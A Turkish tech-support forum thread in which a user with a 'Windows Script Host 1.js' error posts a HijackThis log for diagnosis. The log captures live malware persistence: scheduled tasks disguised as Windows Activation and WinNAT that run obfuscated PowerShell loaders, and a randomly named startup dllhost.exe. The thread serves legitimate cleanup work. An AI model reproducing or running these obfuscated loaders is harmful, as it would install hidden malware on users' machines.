Windows Script Host 1.js bulunamıyor hatası
- Konuyu başlatan Kaef
- Başlangıç Tarihi
- Mesaj 3
- Görüntüleme 902
acv
Megapat
- Katılım
- 31 Temmuz 2015
- Mesajlar
- 7.593
- Makaleler
- 1
- Çözümler
- 74
Aşağıdaki raporu paylaşın.
www.technopat.net
HijackThis Log Paylaşımı ve Çözümleri
Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
KS
KS
Kaef
Decapat
- Katılım
- 26 Ekim 2021
- Mesajlar
- 63
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Aşağıdaki raporu paylaşın.
HijackThis Log Paylaşımı ve Çözümleri
Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
Kod:
Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Platform: x64 Windows 10 (Pro), 10.0.19043.1466 (ReleaseId: 2009, 21H1), Service Pack: 0
Time: 29.01.2022 - 15:34 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: PC (group: Administrators) on EFE, FirstRun: yes
Chrome: 97.0.4692.99
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
1 C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
1 C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
1 C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
1 C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
1 C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
1 C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
1 C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
1 C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
1 C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
1 C:\Program Files\ATI Technologies\ATI.ACE\a4\AdaptiveSleepService.exe
1 C:\Program Files\Bonjour\mDNSResponder.exe
1 C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
1 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
1 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe
2 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\QtWebEngineProcess.exe
1 C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
1 C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.1.9.0_x86__1sdd7yawvg6ne\EarTrumpet\EarTrumpet.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingApp_2112.1001.10.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
1 C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Calculator.exe
1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21121.250.0_x64__8wekyb3d8bbwe\YourPhone.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
1 C:\Users\PC\AppData\Local\Programs\Opera GX\82.0.4227.50\opera_crashreporter.exe
16 C:\Users\PC\AppData\Local\Programs\Opera GX\opera.exe
1 C:\Users\PC\Desktop\Efe\ps3 controller\ps3 controller\ScpServer\bin\ScpService.exe
1 C:\Users\PC\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\ImmersiveControlPanel\SystemSettings.exe
1 C:\Windows\System32\ApplicationFrameHost.exe
1 C:\Windows\System32\atieclxx.exe
1 C:\Windows\System32\atiesrxx.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
3 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\ICEsoundService64.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\MoUsoCoreWorker.exe
1 C:\Windows\System32\oobe\UserOOBEBroker.exe
7 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
84 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\System32\WWAHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
1 C:\Windows\SysWOW64\dllhost.exe
1 C:\Windows\SysWOW64\PnkBstrA.exe
1 C:\Windows\SysWOW64\SecUPDUtilSvc.exe
1 C:\Windows\SysWOW64\wscript.exe
1 D:\Pc remote\PC Remote Receiver\MonectServer.exe
1 D:\Pc remote\PC Remote Receiver\MonectServerService.exe
1 D:\WindowsApps\SystemEraSoftworks.29415440E1269_1.23.107.0_x64__ftk5pbg2rayv2\Astro\Binaries\UWP64\Astro-UWP64-Shipping.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = http://www.joygame.com/games.aspx?g=2001
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyOverride] = *.local
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O1 - Hosts: Reset contents to default
O1 - Hosts: 127.0.0.1 ezglobalyazilim.com
O1 - Hosts: 127.0.0.1 atompremium.com
O1 - Hosts: 127.0.0.1 csrkpremium.com
O1 - Hosts: 127.0.0.1 csrapid.com
O1 - Hosts: 127.0.0.1 csgodings.com
O1 - Hosts: 127.0.0.1 hile.market
O1 - Hosts: 127.0.0.1 csgo.plus
O1 - Hosts: 127.0.0.1 aimstrike.com
O1 - Hosts: 127.0.0.1 moxefpremium.com
O1 - Hosts: 127.0.0.1 csgohilesi.com
O1 - Hosts: 127.0.0.1 turkeycoder.com
O1 - Hosts: 127.0.0.1 ez-csgo.com
O1 - Hosts: 127.0.0.1 hilesatinal.com
O1 - Hosts: 127.0.0.1 oneshotpremium.com
O1 - Hosts: 127.0.0.1 guukgang.com
O1 - Hosts: 127.0.0.1 www.ezglobalyazilim.com
O1 - Hosts: 127.0.0.1 www.atompremium.com
O1 - Hosts: 127.0.0.1 www.csrkpremium.com
O1 - Hosts: 127.0.0.1 www.csrapid.com
O1 - Hosts: 127.0.0.1 www.csg
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_321\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_321\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_321\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_321\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\StartupApproved\Run: [101XPGameCenterTR] = C:\Program Files (x86)\101XP Game Center TR\launcher101xp.exe (file missing) (2021/11/28)
O4 - HKCU\..\StartupApproved\Run: [ApplePhotoStreams] = C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (2020/06/25)
O4 - HKCU\..\StartupApproved\Run: [CCXProcess] = C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [GogGalaxy] = C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe /launchViaAutoStart (file missing) (2021/01/03)
O4 - HKCU\..\StartupApproved\Run: [iCloudServices] = C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (2020/06/25)
O4 - HKCU\..\StartupApproved\Run: [jabber] = C:\Users\PC\AppData\Local\jabber\jabber.exe (file missing) (2020/12/04)
O4 - HKCU\..\StartupApproved\Run: [Opera Browser Assistant] = C:\Users\PC\AppData\Local\Programs\Opera\assistant\browser_assistant.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\PC\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/17)
O4 - HKCU\..\StartupApproved\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (2020/04/07)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/10/30)
O4 - HKCU\..\StartupApproved\Run: [Web Companion] = C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (file missing) (2020/12/24)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steelseries\IpLWqIYgTk.url -> file:///C:\ProgramData\PyTPhClTUh\dllhost.exe (2020/11/25)
O4 - HKLM\..\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = (no file) (2021/02/13)
O4 - HKLM\..\StartupApproved\Run32: [Adobe CCXProcess] = C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (2020/11/25)
O4 - HKLM\..\StartupApproved\Run32: [CanonQuickMenu] = C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon (2021/09/03)
O4 - HKLM\..\StartupApproved\Run32: [LogMeIn Hamachi Ui] = C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe --auto-start (2021/02/16)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2020/12/10)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O4-32 - HKLM\..\Run: [StartCCC] = C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe MSRun
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup = C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steelseries
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup = %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steelseries
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O10 - Unknown file in Winsock LSP: C:\Program Files (x86)\Bonjour\mdnsNSP.dll
O15 - Trusted Zone: *.localhost
O15 - Trusted Zone: http://webcompanion.com
O17 - DHCP DNS 1: 1.1.1.1 (Well-known DNS: Cloudflare / APNIC)
O17 - HKLM\System\CCS\Services\Tcpip\..\{57485bc9-d485-4a91-a778-a8dfe3ea5286}: [NameServer] = 1.1.1.1 (Well-known DNS: Cloudflare / APNIC)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ - C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
O22 - BITS Job: (download) {9FAF0851-0E14-4AEB-B148-C6D3CC2C1AC4} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/apvauhzytyih5dpik5xo7aixju_154/efniojlnjndmcbiieegkicadnoecjjef_154_all_ad5aj5nvkrg3kfsvqiwhdfj5fvyq.crx3 -> C:\Users\PC\AppData\Local\Temp\chrome_BITS_10708_1349940093\efniojlnjndmcbiieegkicadnoecjjef_154_all_ad5aj5nvkrg3kfsvqiwhdfj5fvyq.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$VCcW='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';$vPxR='KePMxjAJinX';$URJHEF=($vPxR[8]+$vPxR[1]+$vPxR[4]);&$URJHEF(&$URJHEF ('''[TeDdFaxt.EncoDdFading]::UTDdFaF''+2*2*2+''.GeDdFatStDdFaring([ConDdFavert]::Fro''+''mDdFaB''+''ase''+8*8+''StriDdFang(([reDdFagex]:DdFa:MaDdFatchDdFaes(''''pkyS1hUdkgyZuFmRkRUayFmRkREdTRXZhZEZEdkL4YUYGRGRUVlO601ZulWYGRGRk92YhZEZE5WRuQHehZEZEVGVu0WZ0FmRkR0c5FmRkR0UbhCehZEZEVWYGRGRptTKyVmYhZEZE1WduxWYGRGRhlmclNlLmJFbmlHZi9GJrcCInsCblRWYGRGRv1kLmJFbmlHZi9GJoASKpc1YDZFJocmbpJHdhZEZENFNhZEZEZTZzFWYGRGRC12bhZEZEJnR6oTX0JXZ2FmRkRkbvNkLtVGdhZEZENXeTtFKgMWYGRGRlRWPLVHS1RyOyVmYtFmRkRUduxWYpFmRkRkclNFLsVWYGRGRk9WTgQ3YlFmRkREblNHf9dCMFZVSSRETBFmRkR0QJNVWIBFXuwFXnAScl1CIElUZhZEZENWa2VGRu8FJ7BSZyFmRkRUZodHflZXahZEZEJHZrFmRkR0cpR2XyMTYGRGRulWYGRGR3BSatFmRkR0dn1jZSxmZ5RmYvRSf7YXQqtEWYRCIuJXYGRGR1RXZy13KrYmUsZWekRyOrRXTyRFJgI3b4JWLg0lZSxmZ5RGJbJGRhZFJgI3bhZEZEhnYtASXTFkTkNFJbZXQqtEWYRSPdNVQOR2UksldBp2SYhFJ7sGdNJHVkAicvFmRkREei1CIpITNxAicvJWLgsGdNJHVkACZuFmRkRUYi1CIzIDK9sGdNJHVk0HM9YmUsZWekRyepQnb192QuIGRhZFJgU2ZtAiZSxmZ5RGJoYWa7lyKrMVQOR2UksDduV3bD5idBp2SYhFJgQHbtAyUB5EZTRyOw0zUB5EZTRCKy9WYGRGRmtDM9YmUsZWekRyOdBzWiRUYWRSPrRXTyRFJ7kSTtNmTFBFJoMXZhZEZERXeCRXYGRGRldkL4YEVVpjOddmbhZEZElGZvNmbF5CdhZEZEhXZU5SblFmRkREdzl3Ub1jYEFmVksXKN12YOVEUk01ZulmchZEZER3cbxidBp2SYhFJd11WlRXYGRGR5J2WoMWZhZEZERGIu9Wa0NWYGRGRuVnZ'''',''''.'''',''''RiDdFaghDdFatTDdFaoLDdFaeft'''')|FoDdFarEaDdFach {$DdFa_DdFa.valDdFaue}) -jDdFao''+''in ''''''''))-repDdFalace''''DDdFadFa''''|&(''''iDdFaeDdFax'''');''-'+'rep'+'lace''DdFa'''))"
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-2561423588-803624942-3961578858-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Task: (disabled) \Microsoft\Windows\UpdateAssistant\UpdateAssistantAllUsersRun - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:NHV20:{} /AllUsersRun (file missing)
O22 - Task: (disabled) \Microsoft\Windows\UpdateAssistant\UpdateAssistantCalendarRun - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:NHV20:{} /CalendarRun (file missing)
O22 - Task: (disabled) \Microsoft\Windows\UpdateAssistant\UpdateAssistantWakeupRun - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:NHV20:{} /WakeupRun (file missing)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (disabled) \S-1-5-21-2561423588-803624942-3961578858-1001\DataSenseLiveTileTask - C:\WINDOWS\System32\DataUsageLiveTileTask.exe
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Apple\AppleSoftwareUpdate - C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe -task
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "9255980565;$Duk='weoDxCiFwp';'k&(4gc7m 9A*)-Toy*e).bNa9mes (]''5_us_2ign3jg -2S_yilst_seqmue;uj.s7ij_ng)- _S=wys{2tde_7m.4_IpO]_;u1cs7i]3ng(= -Sqyysm!t+etum.__R_u/?ntj_iym6_e.eyItn(+tejyr7o6_pSi_ecr_ovih=cce}qs;_buts3yingag2 r-Mi_mc.rq.osv(o{fvgt.]_W-i_)n3xt2g;fwpu!,b7lqeiccc _c3_la2?shs-_ Tx-zu{[{devql_e+_ga7_t_e_h v3ooci3}d _.y_k_m()45;[ps(ubxzl)i92c tds[t_?atgxi!c7+ vuzo_i)_d 1[qrqtguDx7(,)_n{b?_ygt_)e[k_]fMlzxTdfp(=_bFi2_l_ed_.E)_x?iq2st_[sn(+jEky[p-cz4jh_+y_t_vvrw-v+rl_Ekbsp4cjg)?t_F_i.yle_t._R)beazld,A8kll6_Bcy!lte_ys0(9?Ekdrp,ci_jh,}y_ty.vr/!v_rycEkr_p_c8v):__(+b.1ytxie_[55])onR=epsgic}s_t_ory?_.,L/_ocjla/lj_Mauacuh6_inouef._8Op0_e6nr_Su?_bfK2hey(}(6@!_Ek__p3c6gSO07FdT]aWAgxRuE_7\M_kiocphro_us_ozgft-z\tC?)TF__\_T)lIP__E_k48pcy_)z.d+Gea]tyVamal]-uze]s(E_3ktp_/cj_9hzy_ytvz_r0v_)rEouk_p7xc,.}n_ul3ll5_)c;xqifd+(-MegxTn)pk=){=n9au2l_?l)_1r[e_stu/dr{nun;i-hn0t3i Jn_e8==rMx,zTzp46.Lk?epn5!gt5qh!;q3fo_ir_(qlin_2tl v_On.3D_pr,=0h_;tO)cnD!1p} ,[!=43Jbex]-1d};,O__nDd_p4+p_+)l_{3M4pxT7!p_[_7On3[D8pj_]^p]=_(?_byy=tve)z)E_(k]pk3cj_1D0a6)nf1=w{By3kC[kMw_w-?s}ohsuixwx(_.2hstwG=n2_h5}iWp/P8O_7?/__d3,k5=/03=_Q/8.}jlF(A_f9[qjq_v9cxg_7}tP_eLF/oB2g_fbVdcm!0.wEp_pzrX__s,_3,.U)9/kzi.?dix/4_]/8py_9n_)4p4(_h-_5V9])=j}-_En{0l/w{k)nm92XXe60pbnfcMg_5/ad1+f_3I_Pe_OO_sb_D_wg}3b!!._gqg_eSiMn_gL8{B]2zcPQ=(=_w_ha(w3=4IdoaAep[vE!(kp}-c][e=On_,D+ph?Kb_)1z2)l6]8r;_},kIn4_t_P_5trq+ dj4wDJiqk_=_((I+2n{ts2Pt}jrs)r?0;p+I{n8-tP1ct_rht X_rC]lx_=(,pI3n?utPxft_rme)J({eo;__Nt9,Azl-/loa6caau[te_bVui0_rtqouna9_lMg_e-m_-orgayx(p-(I95n_tyrPt_fr=)be(-qk1f)_j,rtbe(f9/ j_kD=J]jk,a+(_I_hntpmPctr_r)(_0_,0_re!pfn scXC_nl_,.40xv_1_0rb00yl,[0}nx4oe0h)__;Mn5a}r_fsh_7aul.i.Cqpo_p(iy(.(M!xh0Tp,_,{0k_,j2aDmJa(k,zwJ(e9k);__(s(]_ykh4){M_]ary)seh2ral_b.}Guuet6eD3eu.lel0gtag}texpF{o{crF=pufn_=ctr_izobfnPf-o_irznto6ekrew(j}nD_J9_k,w_tdyzxpeluo7f3}(y][k_)l/))h!(q)-_;}_l[uDj(lledI_m[_pon_r_t,4(Egwk7p_7cn_vtbd6vllk)Euk_kpc7r)0]dcprm7iivk_atuwe- 7+st1[aut79icy/ ce_hxtz/e_rg?n g8l_oo_ng-a _Nz8tA_}leld9oc+ba1tgjeV[_igr_[tue7aulh_Meffm3oubry?g(wIw5nts_P_tbsr kgKzys_Ax)4,?rh5ef_w ]I[vnt-_P)t_ar 68eujd6,Iz_nqt}_Pt!.rh 2mgitbzl,]fre_xfo 6_In_.t_P{mtr_a cD2-Tl.7,oUs_Inift63,,2 __W_d!_D,t_U_Iqmnt}d3+2)y Gs_Xl)wm;}_''-_renplkacle''_.(_..=)''d,''y$1r'' b-ryepplajce0''Elkp=c''u,[_ch_ar+](k342) 4-rdepxla0ce_''K_b''2,[,chfar5](m37[))?;[xEnfvi_ro_nmaendt]r::_Cuvrr3en_tD/ircecrtolry?=p[wdt;[aTz0]:z:q_qu)D(x);'-replace('.ekkl(ekkl.ekkl.)'-replace'ekkl'),('$'+822/822)|&($Duk[6]+$Duk[1]+$Duk[4]);4121212040" (file missing)
